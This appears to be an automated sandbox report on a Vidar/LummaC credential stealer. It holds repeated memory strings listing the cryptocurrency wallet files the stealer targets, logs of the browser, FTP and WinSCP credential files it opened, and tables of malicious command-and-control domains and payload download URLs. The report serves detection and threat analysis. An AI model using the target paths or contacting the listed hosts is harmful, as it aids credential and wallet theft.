Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2205515395.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90C40 sqlite3_bind_zeroblob,	3_2_6CD90C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90D60 sqlite3_bind_parameter_name,	3_2_6CD90D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB8EA0 sqlite3_clear_bindings,	3_2_6CCB8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6CD90B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB6410 bind,WSAGetLastError,	3_2_6CCB6410

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	wickedneatr.sbs	European Union	13335	CLOUDFLARENETUS	true
95.164.90.97	lade.petperfectcare.com	Gibraltar	39762	VAKPoltavaUkraineUA	true
147.45.44.104	nsdm.cumpar-auto-orice-tip.ro	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
wickedneatr.sbs	188.114.96.3	true
cowod.hopto.org	45.132.206.251	true
nsdm.cumpar-auto-orice-tip.ro	147.45.44.104	true
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true
lade.petperfectcare.com	95.164.90.97	true
fp2e7a.wpc.phicdn.net	192.229.221.95	true
frizzettei.sbs	unknown	unknown
laddyirekyi.sbs	unknown	unknown
bemuzzeki.sbs	unknown	unknown
invinjurhey.sbs	unknown	unknown
isoplethui.sbs	unknown	unknown
198.187.3.20.in-addr.arpa	unknown	unknown
exilepolsiy.sbs	unknown	unknown
exemplarou.sbs	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
frizzettei.sbs	true		unknown
http://lade.petperfectcare.com/mozglue.dll	true		unknown
laddyirekyi.sbs	true		unknown
isoplethui.sbs	true		unknown
http://lade.petperfectcare.com/nss3.dll	true		unknown
http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe	false		unknown
https://steamcommunity.com/profiles/76561199780418869	true	URL Reputation: malware	unknown
invinjurhey.sbs	true		unknown
http://cowod.hopto.org/	true		unknown
exilepolsiy.sbs	true		unknown
https://wickedneatr.sbs/api	true		unknown
http://lade.petperfectcare.com/sql.dll	true		unknown
http://lade.petperfectcare.com/	true		unknown
